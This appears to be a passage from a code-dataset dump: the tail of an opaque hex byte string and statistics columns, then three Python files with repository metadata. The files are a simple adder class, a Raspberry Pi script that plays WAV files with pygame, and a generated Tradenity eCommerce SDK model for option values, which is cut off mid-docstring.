e\xc0\xcc\x6a\x35\x49\x9f\xff\xbd\xd7\x47\xff\xe8\x7c\xe7\x1d\x83\xf6\x04\x91\xaf\xa1\x8e\x11\xa0\x8d\xec\x87\xde\xbb\x4e\xbe\xab\x3c\x82\x8f\xcf\x42\x99\x5a\x0e\x26\x0c\xab\x90\x95\x2f\x32\x4c\xcc\x58\x49\x95\xa3\x36\xbf\x04\x30\xfb\x44\xa0\xce\x4a\x96\xcf\x73\x11\x86\x38\x12\x35\x28\x25\xf5\xf3\x29\x7e\xfa\x75\xe6\x35\x12\x2b\xc4\x58\xfb\x5d\x65\xda\xfd\x28\x73\xe1\x46\x95\x92\x4e\x72\xf6\x2e\x96\xbb\xf6\xac\x17\xa2\x04\xc9\xea\x51\x40\x2e\xe9\x88\xfc\xf0\x7f\x3e\x60\x0b\xab\x4a\x2d\xe5\x04\x17\xba\xd6\x91\xa7\xa2\xed\xa7\x19\xc5\x45\x8d\xa9\xaf\xa9\x8d\x2a\x3a\x67\x55\xdb\xad\x61\x87\x6c\x3f\xdf\xbe\x97\xe6\xdf\x50\x19\x2f\x49\x96\xa4\x04\x65\xa7\x22\xeb\x30\xfe\xf2\xd1\x9b\x71\xa6\x11\x39\x72\x29\xc7\xd0\x20\x35\xa5\x10\x4f\x77\xa2\xc5\xe3\x9c\x51\xa8\x4e\xfd\x18\x2a\xce\xca\xde\x60\x07\x13\xe7\xbf\xb0\x17\xbd\xce\xb6\xd9\x6d\x9f\x6c\x5a\x6e\xe8\x1e\x6f\x26\x18\x18\xda\xe4\x9b\xcf\xe7\x19\x6f\x5e\xe4\xee\x2d\x37\x48\x8e\x3d\x1e\xd8\xfe\x8e\x7f\xe8\x1d\x89\xd9\x04\x44\x48\x59\x3d\x0a\x82\x
eb\x59\xd6\xb3\x7e\xd7\x74\xeb\x57\x8d\xe3\x73\xcb\x49\x07\x2e\x1b\x7b\xa0\x2e\x05\xb4\x6a\x1f\x58\x13\x3f\x8b\x56\x6f\x77\xc5\xa1\x66\x6c\xc4\x9e\x57\xb6\xb7\x9a\xb4\x72\xc5\x04\x16\x11\xcd\xcc\x1a\x7e\x80\x62\xd3\xce\xd4\x01\x63\xb5\x5f\xff\xd6\x36\x96\xcb\x2c\xbf\x94\x71\x98\x05\x17\x5b\xb5\x0a\x73\xc4\xbd\x99\x18\x3a\x30\xac\x64\x68\x6f\x01\x34\x1a\x00\x7c\xe0\x12\xdd\x92\x47\xad\x4c\x64\xf5\x9a\x71\xbd\x69\x39\xed\x21\x61\xce\xa8\x6c\x5a\xab\xe0\xb1\xac\x78\x6b\x9e\x50\x92\xcd\xbd\x0b\x13\xaa\x65\x71\x12\xd1\x44\x45\xd8\x03\xa7\x7c\x59\x22\xcf\x81\x4a\x3b\x94\xb0\xd5\x88\x74\x42\xdc\x5b\x96\x3e\xe8\xc0\x70\xab\x5c\x28\xcc\x2c\xcb\x84\xbf\xcf\x51\xee\x17\x59\x4e\x4a\xac\x65\x64\x88\x2f\xc6\x2c\x24\x93\x71\x98\x09\x1b\x62\xb7\xe0\x4a\x15\xb8\x5e\x79\xc9\xdd\x59\xb0\x34\x4f\x7d\xd7\xb0\xea\x4c\x88\x38\x33\x32\x9d\xaf\xc3\x3e\x11\x84\x96\x77\x0d\x48\x02\x0c\x03\x99\xe5\x6e\x65\x57\xe7\x71\xac\x5f\x5c\xf7\x8a\xe4\x2e\x05\xc8\xb6\x96\xad\x2c\x1f\xd2\x1f\x5d\xfe\x5d\x66\x0e\x38\x43\xf0\x8b\x45\x89\x9e\xb0\x22\xc3\x89\x71\x92\xa3\x5d\x73\xae\xe5\x19\x37\x59\xdf\x89\x2e\x6b\xe4\x8e\x8a\x8f\x12\x06\xd1\x72\x12\xb6\x51\x67\xe4\x44\x11\xc2\xbb\x93\xa2\x2f\xea\x07\x84\x79\xa2\xcb\xa1\x75\x54\x66\xed\x71\xf0\xd0\xf9\x5e\xa0\x4c\x4d\x4f\x33\xcc\x7f\x59\xf7\xfc\xbc\x49\xec\x49\xe4\xa4\xb0\x4f\x12\x01\x9b\x47\x41\x9a\x46\xbc\x45\xa3\xd9\xa4\xd5\x6d\x24\x51\xd8\xff\x41\x46\xa8\x0f\xae\xe2\x10\x68\x69\xa5\xbf\xb2\x8c\xbe\xf9\xc7\xb2\xfe\x1b\x0b\x80\xde\xb5\xa7\x90\xbf\x1a\xe2\x94\x74\x74\xff\x37\x52\x0d\x65\x00\x39\x04\x40\xd9\x01\x76\x57\xa6\xd8\xbb\xdb\x95\x98\xb7\x62\x79\x6f\x6c\x2f\x14\xe4\xe9\x97\xfc\x81\xdf\x42\x3c\xda\xcd\x09\x95\x40\xd2\x1b\x64\xa1\x72\x4d\x20\x9a\xa2\xcb\xce\xaa\x0f\x19\x97\xfd\x48\x95\xd5\x1f\x0e\xd9\xbc\x79\xc1\x8d\x57\x47\xec\x79\x6d\x28\x2a\xba\xba\xf4\x91\x96\xc8\x1e\x87\x72\x2c\x27\x00\xfc\x8a\xac\x1b\x10\xf8\xdb\x64\x5a\xb8\x70\xec\xdc\x92\xda\x2c\x86\x90\x1d\xf3\x94\xeb\xd8\x70\x21\x36\x1e\x79\xed\xd8\x87\x99\x54\x17\xa9\x4f\x30\x38\xb4\xb6\x01\x
6d\x43\xfc\x3e\xd1\x5a\xe1\x5b\xc5\x23\x38\xaf\x98\x1b\x54\x51\x88\xb7\x10\xc3\x58\x19\x52\xaf\xb0\x35\x2b\x40\x91\x92\xb3\x5d\x48\x01\x71\xbd\x4f\x0a\xea\x87\x7e\x60\xce\x1d\xd0\xfa\x74\x8a\x8c\x22\x97\x3e\x63\x8e\x83\x1a\x3d\x21\xf6\xc8\x92\xfa\x6f\x43\xa9\x5f\xd1\x1f\x73\xff\x4a\x35\x14\x14\x8e\x3e\xe7\x9b\x0b\xa2\xa7\x70\x72\xa0\xac\xeb\xb8\x49\xa8\xbe\x3d\x65\xf8\x4a\x88\x2a\x06\x75\x5f\x87\x87\x85\x90\x43\x7e\x84\xc8\x5d\x1d\x40\x1a\x18\x88\xef\xbd\x3e\xe1\xc0\x92\xd2\x3c\xa8\x44\x48\x74\xa9\x17\x6f\xd7\xc5\x60\x95\xe8\x74\x2e\xd8\x73\x4d\x48\x02\xb0\x2e\x71\x52\x3a\x7f\x5b\xd1\xfc\x6c\x0b\x2d\x6e\xe3\xad\xe3\xeb\xa1\x8d\x95\xa9\x2f\xac\x24\x1d\x10\x4d\x5f\xfd\x89\xf1\xe8\x06\x7f\x60\x96\x81\x48\x59\x07\x8e\x99\xfa\xe9\xd4\xbd\x7b\xff\xc0\x3d\x51\xd0\xae\x17\xb3\x9a\xd3\x3b\x92\xc1\x1d\x8f\x51\xe3\x6d\x78\x60\xb8\xcb\xf1\x26\xb6\x3f\x63\x8c\xd6\xb8\xec\xa9\xaf\x45\x23\xde\xf0\x86\x03\x8c\x91\xb9\x08\x95\xca\x70\xc3\x06\x7c\x1f\x12\x1a\xb8\xab\xba\xc3\xaf\x0c\x9b\x77\x22\xc0\x95\x79\xbb\xbc\x1b\x0f\x87\x90\x23\x3c\x2b\x08\x2a\x02\xac\xb1\x9d\x55\xfb\x3a\x44\xa2\x08\x6f\x5e\xa5\x61\x1d\x78\x06\xdb\x22\x6c\xdd\x92\xef\xb1\xeb\xb4\xf7\x55\x52\x4c\x25\xe1\xb7\x5c\xbc\xa7\xcf\x5d\xb5\x50\x4d\xe3\xc3\xd2\xc5\x46\xfb\xb1\x35\x3f\x32\x24\x5f\x42\x7d\xf6\xc9\x48\x4f\x66\xd9\xdb\xd0\xb8\x21\x2b\xc8\xf4\x3a\x23\x8f\x20\x34\xdc\x9f\x1a\x82\x34\xdf\x2b\x5c\x6b\xd4\x02\xb4\x69\x28\xd4\x86\xd8\x15\x24\x30\xf7\x14\x2e\x25\x92\x74\x91\xce\xde\xfa\x74\xbc\x90\x83\x69\xe0\xc8\x56\xbe\x87\xe3\x41\x1e\x50\x99\x2f\x23\xf3\xc4\x63\xba\xd6\xb6\x99\x48\x76\x0f\xdc\x1e\xaa\x3e\xd1\x9f\x68\xab\xaa\x43\xc3\xfc\x43\x6b\xe2\xf3\x30\x76\x9e\x77\x2f\x87\x3c\x67\x19\x65\xa5\x05\xcc\xcf\x13\x33\x96\x54\xab\x18\x5a\x59\xc2\x05\xbf\x5c\x53\x6d\x6a\x64\x49\x95\x0e\x2f\xc8\x69\x4d\x01\x44\x2b\x84\xc7\xf2\x2d\xc9\x49\x38\x80\x9c\x52\x37\xbe\xda\x78\x39\x1f\xfa\x3e\x86\x83\xb4\x5c\x29\xde\x95\xf3\x8d\xaa\x09\xe8\x42\x92\x68\x91\x91\xea\xcd\x83\xe8\xe7\x2f\x3e\x93\x6f\x1e\x6a\xc6\x82\x48\x5c\x19\x97\x
ef\x9f\x19\x59\x81\xb5\x65\xe3\x58\xf1\xd9', 2) | 4,035.666667 | 12,047 | 0.750475 | 3,014 | 12,107 | 3.009954 | 0.087923 | 0.012566 | 0.012897 | 0.010582 | 0.004299 | 0.002646 | 0.002646 | 0 | 0 | 0 | 0 | 0.310077 | 0.000826 | 12,107 | 3 | 12,047 | 4,035.666667 | 0.439861 | 0 | 0 | 0 | 0 | 0.333333 | 0.991905 | 0.991905 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
f16be9e085b5f727674c1b77b78d0f4579ef9123 | 159 | py | Python | src/py220_supplemental/lessons/lesson01/activity/calculator/adder.py | UWPCE-Python-Course-2-Materials/supplementary_files | d3155b09a92d9660099da0f331663f472a9289eb | [
"MIT"
] | 10 | 2020-06-28T05:38:32.000Z | 2022-01-27T13:48:51.000Z | src/py220_supplemental/lessons/lesson01/activity/calculator/adder.py | UWPCE-Python-Course-2-Materials/supplementary_files | d3155b09a92d9660099da0f331663f472a9289eb | [
"MIT"
] | null | null | null | src/py220_supplemental/lessons/lesson01/activity/calculator/adder.py | UWPCE-Python-Course-2-Materials/supplementary_files | d3155b09a92d9660099da0f331663f472a9289eb | [
"MIT"
] | 5 | 2020-09-24T20:14:36.000Z | 2021-11-07T22:47:23.000Z | """ This module provides an addition operator. """
class Adder():
@staticmethod
def calc(operand_1, operand_2):
return operand_1 + operand_2
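A minimal usage sketch for the `Adder` class above (redeclared here so the snippet is self-contained):

```python
# Adder.calc simply delegates to the + operator, so it accepts any
# operands that support addition (ints, floats, strings, lists, ...).
class Adder():
    @staticmethod
    def calc(operand_1, operand_2):
        return operand_1 + operand_2

print(Adder.calc(2, 3))        # 5
print(Adder.calc("ab", "cd"))  # abcd
```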
| 19.875 | 50 | 0.672956 | 20 | 159 | 5.15 | 0.75 | 0.15534 | 0.291262 | 0.31068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03252 | 0.226415 | 159 | 7 | 51 | 22.714286 | 0.804878 | 0.264151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
2d41d69e12c9d38495e2c8b843c8e9556566178d | 400 | py | Python | testVideo.py | YanMinge/Physical_Programming_For_Codey | b7220af94a0130b01b1fe17ae9c0f9a3ef727622 | [
"MIT"
] | null | null | null | testVideo.py | YanMinge/Physical_Programming_For_Codey | b7220af94a0130b01b1fe17ae9c0f9a3ef727622 | [
"MIT"
] | null | null | null | testVideo.py | YanMinge/Physical_Programming_For_Codey | b7220af94a0130b01b1fe17ae9c0f9a3ef727622 | [
"MIT"
] | 1 | 2020-01-11T05:49:34.000Z | 2020-01-11T05:49:34.000Z | import pygame
import time
pygame.mixer.init()
pygame.mixer.music.load("/home/pi/project/codey_test/images/CodeDownloadSuc.wav")
pygame.mixer.music.play()
time.sleep(2)
pygame.mixer.music.load("/home/pi/project/codey_test/images/readyWork.wav")
pygame.mixer.music.play()
time.sleep(2)
pygame.mixer.music.load("/home/pi/project/codey_test/images/startWork.wav")
pygame.mixer.music.play()
time.sleep(2) | 30.769231 | 81 | 0.79 | 64 | 400 | 4.890625 | 0.3125 | 0.246006 | 0.306709 | 0.191693 | 0.776358 | 0.776358 | 0.776358 | 0.776358 | 0.670927 | 0.670927 | 0 | 0.007772 | 0.035 | 400 | 13 | 82 | 30.769231 | 0.803109 | 0 | 0 | 0.5 | 0 | 0 | 0.374065 | 0.374065 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
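The three load/play/sleep repetitions in `testVideo.py` could be collapsed into a data-driven loop. A sketch under stated assumptions: `clip_paths` and `play_clips` are hypothetical helper names, and the mixer and sleep function are injected so the snippet runs without pygame installed.

```python
# Paths and the 2-second pause are taken from the script above.
BASE = "/home/pi/project/codey_test/images"
CLIPS = ["CodeDownloadSuc.wav", "readyWork.wav", "startWork.wav"]

def clip_paths(base=BASE, clips=CLIPS):
    """Full paths of the clips, in play order."""
    return ["{}/{}".format(base, name) for name in clips]

def play_clips(mixer, sleep, pause=2):
    """Load and play each clip in turn, pausing `pause` seconds between."""
    for path in clip_paths():
        mixer.music.load(path)
        mixer.music.play()
        sleep(pause)
```

With pygame available this would be invoked as `play_clips(pygame.mixer, time.sleep)` after `pygame.mixer.init()`.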
743949564612d26ab0bee048c07de5a98c75cad6 | 28,615 | py | Python | tradenity/resources/option_value.py | tradenity/python-sdk | d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | [
"Apache-2.0"
] | 1 | 2020-03-19T04:09:17.000Z | 2020-03-19T04:09:17.000Z | tradenity/resources/option_value.py | tradenity/python-sdk | d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | [
"Apache-2.0"
] | null | null | null | tradenity/resources/option_value.py | tradenity/python-sdk | d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Tradenity API
Tradenity eCommerce Rest API
Contact: support@tradenity.com
"""
from __future__ import absolute_import
import re
import pprint
# python 2 and python 3 compatibility library
import six
from tradenity.api_client import ApiClient
class OptionValue(object):
swagger_types = {
'id': 'str',
'meta': 'InstanceMeta',
'option': 'Option',
'value': 'str',
'code': 'str'
}
attribute_map = {
'id': 'id',
'meta': '__meta',
'option': 'option',
'value': 'value',
'code': 'code'
}
api_client = None
def __init__(self, id=None, meta=None, option=None, value=None, code=None):
"""OptionValue - a model defined in Swagger"""
self._id = id
self._meta = None
self._option = None
self._value = None
self._code = None
self.discriminator = None
if meta is not None:
self.meta = meta
self.option = option
self.value = value
self.code = code
@property
def id(self):
if self._id:
return self._id
elif self.meta is None:
return None
else:
self._id = self.meta.href.split("/")[-1]
return self._id
@id.setter
def id(self, new_id):
self._id = new_id
@property
def meta(self):
"""Gets the meta of this OptionValue.
:return: The meta of this OptionValue.
:rtype: InstanceMeta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""Sets the meta of this OptionValue.
:param meta: The meta of this OptionValue.
:type: InstanceMeta
"""
self._meta = meta
@property
def option(self):
"""Gets the option of this OptionValue.
:return: The option of this OptionValue.
:rtype: Option
"""
return self._option
@option.setter
def option(self, option):
"""Sets the option of this OptionValue.
:param option: The option of this OptionValue.
:type: Option
"""
self._option = option
@property
def value(self):
"""Gets the value of this OptionValue.
:return: The value of this OptionValue.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this OptionValue.
:param value: The value of this OptionValue.
:type: str
"""
self._value = value
@property
def code(self):
"""Gets the code of this OptionValue.
:return: The code of this OptionValue.
:rtype: str
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this OptionValue.
:param code: The code of this OptionValue.
:type: str
"""
self._code = code
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(OptionValue, dict):
for key, value in self.items():
result[key] = value
return result
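The recursive conversion in `to_dict` above can be illustrated with a toy model. The `Toy` class is illustrative only, not part of the SDK; it shows the same pattern of dispatching on lists, `to_dict`-capable objects, and dicts.

```python
# Toy illustration of the to_dict pattern: nested models, lists and dicts
# are converted recursively via hasattr(x, "to_dict") checks.
class Toy(object):
    def __init__(self, **attrs):
        self.attrs = attrs

    def to_dict(self):
        def conv(v):
            if isinstance(v, list):
                return [conv(x) for x in v]
            if hasattr(v, "to_dict"):
                return v.to_dict()
            if isinstance(v, dict):
                return {k: conv(x) for k, x in v.items()}
            return v
        return {k: conv(v) for k, v in self.attrs.items()}

inner = Toy(value="red", code="R")
outer = Toy(option="color", values=[inner])
print(outer.to_dict())
# {'option': 'color', 'values': [{'value': 'red', 'code': 'R'}]}
```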
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OptionValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
@classmethod
def get_api_client(cls):
if cls.api_client is None:
cls.api_client = ApiClient.instance()
return cls.api_client
@classmethod
def find_all(cls, **kwargs):
return cls.list_all_option_values(**kwargs)
@classmethod
def find_all_by(cls, **kwargs):
return cls.list_all_option_values(**kwargs)
@classmethod
def find_one_by(cls, **kwargs):
results = cls.list_all_option_values(**kwargs)
if len(results) > 0:
return results[0]
@classmethod
def find_by_id(cls, id):
return cls.get_option_value_by_id(id)
def create(self):
new_instance = self.create_option_value(self)
self.id = new_instance.id
return self
def update(self):
return self.update_option_value_by_id(self.id, self)
def delete(self):
return self.delete_option_value_by_id(self.id)
@classmethod
def create_option_value(cls, option_value, **kwargs):
"""Create OptionValue
Create a new OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_option_value(option_value, async=True)
>>> result = thread.get()
:param async bool
:param OptionValue option_value: Attributes of optionValue to create (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._create_option_value_with_http_info(option_value, **kwargs)
else:
(data) = cls._create_option_value_with_http_info(option_value, **kwargs)
return data
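The sync/async dispatch used by `create_option_value` above follows a common pattern: the same worker either returns its result directly, or returns a handle whose `.get()` yields the result later. A toy sketch (all names here are illustrative; the flag is spelled `async_req` in the sketch because `async` is a reserved word in modern Python, whereas the SDK keys it as the string `'async'` in kwargs):

```python
from threading import Thread

class AsyncResult(object):
    """Handle for a result computed on a background thread."""
    def __init__(self, func, *args):
        self._result = None
        self._thread = Thread(target=self._run, args=(func,) + args)
        self._thread.start()

    def _run(self, func, *args):
        self._result = func(*args)

    def get(self):
        self._thread.join()
        return self._result

def call_api(payload, **kwargs):
    work = lambda p: {"created": p}      # stands in for the HTTP round trip
    if kwargs.get('async_req'):          # async path: hand back a handle
        return AsyncResult(work, payload)
    return work(payload)                 # sync path: block and return data
```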
@classmethod
def _create_option_value_with_http_info(cls, option_value, **kwargs):
"""Create OptionValue
Create a new OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_option_value_with_http_info(option_value, async=True)
>>> result = thread.get()
:param async bool
:param OptionValue option_value: Attributes of optionValue to create (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value' is set
if ('option_value' not in params or
params['option_value'] is None):
raise ValueError("Missing the required parameter `option_value` when calling `create_option_value`")
collection_formats = {}
path_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'option_value' in params:
body_params = params['option_value']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats,
            # 'async' became a reserved word in Python 3.7, so it is passed
            # via ** (and last, which also keeps Python 2 happy).
            **{'async': params.get('async')})
@classmethod
def delete_option_value_by_id(cls, option_value_id, **kwargs):
"""Delete OptionValue
Delete an instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_option_value_by_id(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._delete_option_value_by_id_with_http_info(option_value_id, **kwargs)
else:
(data) = cls._delete_option_value_by_id_with_http_info(option_value_id, **kwargs)
return data
@classmethod
def _delete_option_value_by_id_with_http_info(cls, option_value_id, **kwargs):
"""Delete OptionValue
Delete an instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_option_value_by_id_with_http_info(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `delete_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats,
            # 'async' became a reserved word in Python 3.7, so it is passed
            # via ** (and last, which also keeps Python 2 happy).
            **{'async': params.get('async')})
@classmethod
def get_option_value_by_id(cls, option_value_id, **kwargs):
"""Find OptionValue
Return single instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_option_value_by_id(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to return (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._get_option_value_by_id_with_http_info(option_value_id, **kwargs)
else:
(data) = cls._get_option_value_by_id_with_http_info(option_value_id, **kwargs)
return data
@classmethod
def _get_option_value_by_id_with_http_info(cls, option_value_id, **kwargs):
"""Find OptionValue
Return single instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_option_value_by_id_with_http_info(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to return (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `get_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats,
            # 'async' became a reserved word in Python 3.7, so it is passed
            # via ** (and last, which also keeps Python 2 happy).
            **{'async': params.get('async')})
@classmethod
def list_all_option_values(cls, **kwargs):
"""List OptionValues
Return a list of OptionValues
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_option_values(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[OptionValue]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._list_all_option_values_with_http_info(**kwargs)
else:
(data) = cls._list_all_option_values_with_http_info(**kwargs)
return data
@classmethod
def _list_all_option_values_with_http_info(cls, **kwargs):
"""List OptionValues
Return a list of OptionValues
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_option_values_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[OptionValue]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
if 'page' in params:
query_params.append(('page', params['page']))
if 'size' in params:
query_params.append(('size', params['size']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='page[OptionValue]',
auth_settings=auth_settings,
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats,
            # 'async' became a reserved word in Python 3.7, so it is passed
            # via ** (and last, which also keeps Python 2 happy).
            **{'async': params.get('async')})
@classmethod
def replace_option_value_by_id(cls, option_value_id, option_value, **kwargs):
"""Replace OptionValue
Replace all attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_option_value_by_id(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to replace (required)
:param OptionValue option_value: Attributes of optionValue to replace (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._replace_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
else:
(data) = cls._replace_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
return data
@classmethod
def _replace_option_value_by_id_with_http_info(cls, option_value_id, option_value, **kwargs):
"""Replace OptionValue
Replace all attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_option_value_by_id_with_http_info(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to replace (required)
:param OptionValue option_value: Attributes of optionValue to replace (required)
:return: OptionValue
